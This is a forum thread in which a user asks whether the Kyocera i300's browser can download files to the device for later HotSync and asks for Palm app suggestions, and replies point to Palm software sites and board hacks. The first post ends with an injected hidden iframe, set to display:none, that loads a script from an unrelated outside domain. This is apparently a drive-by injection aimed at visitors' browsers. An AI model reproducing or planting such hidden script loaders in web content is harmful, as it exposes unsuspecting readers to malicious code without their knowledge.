+ Reply to Thread

Question Downloading FILES direct to I-300 from browser?

Is it possible to use Eudora browser (or blazer) to download files directly to the palm unit's memory, then transfer the file to a computer at the time of hotsync?

I'd like to think it'd be possible to download files or mp3's (in the middle of the night while i'm sleeping) and then synch them over the next day. Is there an application out there that makes this possible?

Also i've never seen (any) applications written specifically for the I-300, does anyone know any good I-300 or palm applications I may want to take a look at just for kicks?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

nothing out there is specifically written for the i300. if you go to palmgear.com for example, you will find programs for the PALM OS.

there are a couple of hacks on this board that has been written with the i300 in mind. search the board for more info.

check out this thread for some of the stuff folks are using. And the hacks Marc refers to can be found at PDAapps and at Jakes page ............ Happy hunting
    .....beam me up Scotty...